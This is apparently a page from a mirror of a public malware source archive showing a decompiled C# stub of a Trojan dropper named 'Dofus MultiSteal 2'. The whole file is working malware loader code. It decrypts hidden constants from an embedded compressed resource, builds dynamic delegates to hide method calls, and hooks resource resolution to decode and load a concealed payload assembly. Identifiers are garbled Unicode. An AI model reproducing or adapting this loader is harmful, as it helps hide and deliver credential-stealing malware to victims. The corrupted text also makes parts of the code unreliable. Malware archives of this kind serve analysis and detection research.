mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
194 lines
9.1 KiB
C#
194 lines
9.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: <Module>
|
|||
|
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Collections;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.IO.Compression;
|
|||
|
using System.Reflection;
|
|||
|
using System.Reflection.Emit;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
internal class \u003CModule\u003E
|
|||
|
{
|
|||
|
static \u003CModule\u003E()
|
|||
|
{
|
|||
|
\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.膒\uF296\u2595ꗫ燞\uFFDDﹱ蔙();
|
|||
|
AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(\u003CModule\u003E.\u0003\uFFFD\uFFFD\uFFFD\u0027Q\uFFFDN\uFFFD\uFFFD\uFFFDN\uFFFD\uFFFD\u001A\uFFFD);
|
|||
|
\u192E\uF515ᯬ\uFFFD\u3347䡯運ப.阛苕头\u2100䦀簴Ṽ芹();
|
|||
|
}
|
|||
|
|
|||
|
internal static object G\u007Dzi\u0009\uFFFD\uFFFDi\u0020\u0009\uFFFD\uFFFD\u0002\u002E\uFFFD\u007C(
|
|||
|
uint id)
|
|||
|
{
|
|||
|
if (!(AppDomain.CurrentDomain.GetData("<22><>G7z<37><7A><EFBFBD>],<2C><><EFBFBD>\u001A<31>") is Dictionary<uint, object> dictionary))
|
|||
|
{
|
|||
|
AppDomain.CurrentDomain.SetData("<22><>G7z<37><7A><EFBFBD>],<2C><><EFBFBD>\u001A<31>", (object) (dictionary = new Dictionary<uint, object>()));
|
|||
|
MemoryStream memoryStream = new MemoryStream();
|
|||
|
using (DeflateStream deflateStream = new DeflateStream(Assembly.GetCallingAssembly().GetManifestResourceStream("<22><>G7z<37><7A><EFBFBD>],<2C><><EFBFBD>\u001A<31>"), CompressionMode.Decompress))
|
|||
|
{
|
|||
|
byte[] buffer = new byte[4096];
|
|||
|
int count = deflateStream.Read(buffer, 0, 4096);
|
|||
|
do
|
|||
|
{
|
|||
|
memoryStream.Write(buffer, 0, count);
|
|||
|
count = deflateStream.Read(buffer, 0, 4096);
|
|||
|
}
|
|||
|
while (count != 0);
|
|||
|
}
|
|||
|
AppDomain.CurrentDomain.SetData("~<7E><><EFBFBD>m9<6D><39>e<EFBFBD><65>YWT<57>", (object) memoryStream.ToArray());
|
|||
|
}
|
|||
|
uint num1 = 210013081U ^ (uint) new StackFrame(1).GetMethod().MetadataToken;
|
|||
|
uint num2 = 1313548208;
|
|||
|
uint num3 = 2037355434;
|
|||
|
for (uint index = 1; index <= 64U; ++index)
|
|||
|
{
|
|||
|
num1 = (uint) (((int) num1 & 16777215) << 8) | (num1 & 4278190080U) >> 24;
|
|||
|
uint num4 = (num1 & (uint) byte.MaxValue) % 64U;
|
|||
|
if (num4 >= 0U && num4 < 16U)
|
|||
|
{
|
|||
|
num2 |= (uint) ((int) ((num1 & 65280U) >> 8) & (int) ((num1 & 16711680U) >> 16) ^ ~(int) num1 & (int) byte.MaxValue);
|
|||
|
num3 ^= (uint) ((int) num1 * (int) index + 1) % 16U;
|
|||
|
num1 += (uint) (((int) num2 | (int) num3) ^ 2006291989);
|
|||
|
}
|
|||
|
else if (num4 >= 16U && num4 < 32U)
|
|||
|
{
|
|||
|
num2 ^= (uint) (((int) num1 & 16711935) << 8 ^ ((int) ((num1 & 16776960U) >> 8) | ~(int) num1 & (int) ushort.MaxValue));
|
|||
|
num3 += num1 * index % 32U;
|
|||
|
num1 |= (uint) ((int) num2 + ~(int) num3 & 2006291989);
|
|||
|
}
|
|||
|
else if (num4 >= 32U && num4 < 48U)
|
|||
|
{
|
|||
|
num2 += (uint) (((int) num1 & (int) byte.MaxValue | (int) ((num1 & 16711680U) >> 16)) + (~(int) num1 & (int) byte.MaxValue));
|
|||
|
num3 -= (uint) ~((int) num1 + (int) num4) % 48U;
|
|||
|
num1 ^= num2 % num3 | 2006291989U;
|
|||
|
}
|
|||
|
else if (num4 >= 48U && num4 < 64U)
|
|||
|
{
|
|||
|
num2 ^= (uint) (((int) ((num1 & 16711680U) >> 16) | ~((int) num1 & (int) byte.MaxValue)) * (~(int) num1 & 16711680));
|
|||
|
num3 += (num1 ^ index - 1U) % num4;
|
|||
|
num1 -= (uint) (~((int) num2 ^ (int) num3) + 2006291989);
|
|||
|
}
|
|||
|
}
|
|||
|
uint num5 = num1 ^ id;
|
|||
|
object obj;
|
|||
|
if (!dictionary.TryGetValue(num5, out obj))
|
|||
|
{
|
|||
|
using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream((byte[]) AppDomain.CurrentDomain.GetData("~<7E><><EFBFBD>m9<6D><39>e<EFBFBD><65>YWT<57>"))))
|
|||
|
{
|
|||
|
binaryReader.BaseStream.Seek((long) num5, SeekOrigin.Begin);
|
|||
|
byte num6 = binaryReader.ReadByte();
|
|||
|
byte[] bytes = binaryReader.ReadBytes(binaryReader.ReadInt32());
|
|||
|
Random random = new Random(2006291989 ^ (int) num5);
|
|||
|
byte[] numArray = new byte[bytes.Length];
|
|||
|
random.NextBytes(numArray);
|
|||
|
BitArray bitArray = new BitArray(bytes);
|
|||
|
bitArray.Xor(new BitArray(numArray));
|
|||
|
bitArray.CopyTo((Array) bytes, 0);
|
|||
|
switch (num6)
|
|||
|
{
|
|||
|
case 36:
|
|||
|
obj = (object) BitConverter.ToSingle(bytes, 0);
|
|||
|
break;
|
|||
|
case 54:
|
|||
|
obj = (object) Encoding.UTF8.GetString(bytes);
|
|||
|
break;
|
|||
|
case 85:
|
|||
|
obj = (object) BitConverter.ToInt32(bytes, 0);
|
|||
|
break;
|
|||
|
case 93:
|
|||
|
obj = (object) BitConverter.ToDouble(bytes, 0);
|
|||
|
break;
|
|||
|
case 129:
|
|||
|
obj = (object) BitConverter.ToInt64(bytes, 0);
|
|||
|
break;
|
|||
|
}
|
|||
|
dictionary[num5] = obj;
|
|||
|
}
|
|||
|
}
|
|||
|
return obj;
|
|||
|
}
|
|||
|
|
|||
|
internal static void \u2A14쒗ൾ甒ᵾⲘṀ贈(RuntimeFieldHandle f)
|
|||
|
{
|
|||
|
FieldInfo fieldFromHandle = FieldInfo.GetFieldFromHandle(f);
|
|||
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|||
|
char[] chArray = new char[fieldFromHandle.Name.Length];
|
|||
|
for (int index = 0; index < chArray.Length; index++)
|
|||
|
chArray[index] = (char) ((int) (byte) fieldFromHandle.Name[index] ^ index);
|
|||
|
ConstructorInfo con = executingAssembly.GetModules()[0].ResolveMethod(BitConverter.ToInt32(Convert.FromBase64String(new string(chArray)), 0) ^ 1762333708) as ConstructorInfo;
|
|||
|
ParameterInfo[] parameters = con.GetParameters();
|
|||
|
Type[] parameterTypes = new Type[parameters.Length];
|
|||
|
for (int index = 0; index < parameters.Length; index++)
|
|||
|
parameterTypes[index] = parameters[index].ParameterType;
|
|||
|
DynamicMethod dynamicMethod = new DynamicMethod("", con.DeclaringType, parameterTypes, con.DeclaringType, true);
|
|||
|
ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
|
|||
|
for (int index = 0; index < parameterTypes.Length; index++)
|
|||
|
ilGenerator.Emit(OpCodes.Ldarg_S, index);
|
|||
|
ilGenerator.Emit(OpCodes.Newobj, con);
|
|||
|
ilGenerator.Emit(OpCodes.Ret);
|
|||
|
fieldFromHandle.SetValue((object) null, (object) dynamicMethod.CreateDelegate(fieldFromHandle.FieldType));
|
|||
|
}
|
|||
|
|
|||
|
internal static void 鶨Ⴋ糌專埈ᚳẏ嫞(RuntimeFieldHandle f)
|
|||
|
{
|
|||
|
FieldInfo fieldFromHandle = FieldInfo.GetFieldFromHandle(f);
|
|||
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|||
|
char[] chArray = new char[fieldFromHandle.Name.Length];
|
|||
|
for (int index = 0; index < chArray.Length; ++index)
|
|||
|
chArray[index] = (char) ((int) (byte) fieldFromHandle.Name[index] ^ index);
|
|||
|
byte[] numArray = Convert.FromBase64String(new string(chArray));
|
|||
|
MethodInfo methodInfo = executingAssembly.GetModules()[0].ResolveMethod(BitConverter.ToInt32(numArray, 1) ^ 78618627) as MethodInfo;
|
|||
|
if (methodInfo.IsStatic)
|
|||
|
{
|
|||
|
fieldFromHandle.SetValue((object) null, (object) Delegate.CreateDelegate(fieldFromHandle.FieldType, methodInfo));
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
ParameterInfo[] parameters = methodInfo.GetParameters();
|
|||
|
Type[] parameterTypes = new Type[parameters.Length + 1];
|
|||
|
parameterTypes[0] = typeof (object);
|
|||
|
for (int index = 0; index < parameters.Length; ++index)
|
|||
|
parameterTypes[index + 1] = parameters[index].ParameterType;
|
|||
|
DynamicMethod dynamicMethod = !methodInfo.DeclaringType.IsInterface ? new DynamicMethod("", methodInfo.ReturnType, parameterTypes, methodInfo.DeclaringType, true) : new DynamicMethod("", methodInfo.ReturnType, parameterTypes, (Type) null, true);
|
|||
|
ILGenerator ilGenerator = dynamicMethod.GetILGenerator();
|
|||
|
for (int index = 0; index < parameterTypes.Length; ++index)
|
|||
|
{
|
|||
|
ilGenerator.Emit(OpCodes.Ldarg, index);
|
|||
|
if (index == 0)
|
|||
|
ilGenerator.Emit(OpCodes.Castclass, methodInfo.DeclaringType);
|
|||
|
}
|
|||
|
ilGenerator.Emit(numArray[0] == (byte) 13 ? OpCodes.Callvirt : OpCodes.Call, methodInfo);
|
|||
|
ilGenerator.Emit(OpCodes.Ret);
|
|||
|
fieldFromHandle.SetValue((object) null, (object) dynamicMethod.CreateDelegate(fieldFromHandle.FieldType));
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal static Assembly \u0003\uFFFD\uFFFD\uFFFD\u0027Q\uFFFDN\uFFFD\uFFFD\uFFFDN\uFFFD\uFFFD\u001A\uFFFD(
|
|||
|
object sender,
|
|||
|
ResolveEventArgs args)
|
|||
|
{
|
|||
|
if (!(AppDomain.CurrentDomain.GetData("NGS9\u0016<31><36>J<EFBFBD><4A>\u0010<31>1\u001Cr<43>") is Assembly data))
|
|||
|
{
|
|||
|
using (BinaryReader binaryReader1 = new BinaryReader((Stream) new DeflateStream(typeof (\u003CModule\u003E).Assembly.GetManifestResourceStream("NGS9\u0016<31><36>J<EFBFBD><4A>\u0010<31>1\u001Cr<43>"), CompressionMode.Decompress)))
|
|||
|
{
|
|||
|
byte[] numArray = binaryReader1.ReadBytes(binaryReader1.ReadInt32());
|
|||
|
byte[] buffer = new byte[numArray.Length / 2];
|
|||
|
for (int index = 0; index < numArray.Length; index += 2)
|
|||
|
buffer[index / 2] = (byte) (((int) numArray[index + 1] ^ 33) * 33 + ((int) numArray[index] ^ 33));
|
|||
|
using (BinaryReader binaryReader2 = new BinaryReader((Stream) new DeflateStream((Stream) new MemoryStream(buffer), CompressionMode.Decompress)))
|
|||
|
{
|
|||
|
data = Assembly.Load(binaryReader2.ReadBytes(binaryReader2.ReadInt32()));
|
|||
|
AppDomain.CurrentDomain.SetData("NGS9\u0016<31><36>J<EFBFBD><4A>\u0010<31>1\u001Cr<43>", (object) data);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
return Array.IndexOf<string>(data.GetManifestResourceNames(), args.Name) == -1 ? (Assembly) null : data;
|
|||
|
}
|
|||
|
}
|